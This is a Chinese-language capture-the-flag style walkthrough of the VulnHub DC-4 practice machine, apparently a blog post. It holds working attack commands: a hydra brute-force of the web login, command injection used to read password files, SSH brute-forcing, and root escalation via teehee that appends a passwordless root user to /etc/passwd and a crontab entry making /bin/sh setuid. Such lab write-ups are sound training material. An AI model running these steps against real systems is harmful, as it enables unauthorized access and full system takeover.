vulnhub 入门DC-4

nmap扫存活主机,192.168.254.132。扫端口服务

在这里插入图片描述

22端口ssh和80,访问80端口,一个管理员登录框

在这里插入图片描述

hydra爆破,用户名admin,登录成功的标志是有logout(burpsuite放大字典卡死,还是用hydra)

hydra -l admin -P /usr/share/wordlists/rockyou.txt 192.168.254.132 http-post-form "/login.php:username=^USER^&password=^PASS^:S=logout"

在这里插入图片描述

在这里插入图片描述

有个执行命令的文件

在这里插入图片描述

抓包看看

在这里插入图片描述

可以修改命令,看看有哪些用户ls /home

在这里插入图片描述

ssh爆破失败。翻到旧密码文件

在这里插入图片描述

cat /home/jim/backups/old-passwords.bak

在这里插入图片描述

拿旧密码去爆破ssh

在这里插入图片描述

密码为jibril04。ssh连接
在这里插入图片描述

折腾了半天不知道怎么提权,后来才发现有一封mail(ssh连接的时候没注意看),真正的在var/mail/jim

在这里插入图片描述

得到密码^xHhA&hvim0y。切换到charles用户,登录成功。sudo -l看看(jim不能sudo
在这里插入图片描述

能以teehee命令提权。添加一个超级用户(在文件末尾添加)

sudo teehee -a /etc/passwd
pon::0:0:::/bin/bash

在这里插入图片描述

su pon切换到超级用户,得到root权限

在这里插入图片描述

借助teehee添加定时任务,提权

echo "* * * * * root chmod 4777 /bin/sh" | sudo teehee -a /etc/crontab

每分钟以root用户的身份将/bin/sh的权限提升为4777。当一分钟过后,我们执行命令/bin/sh就可以得到root权限。

在这里插入图片描述
总结

1.hydra爆破登录框,联想登录成功有哪些特征字符串

2.一些意想不到的文件,比如旧密码

3.注意细节,ssh连接成功时收到邮件

4.teehee提权

---------------------------跨年是DC-3和DC-4陪的:)

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值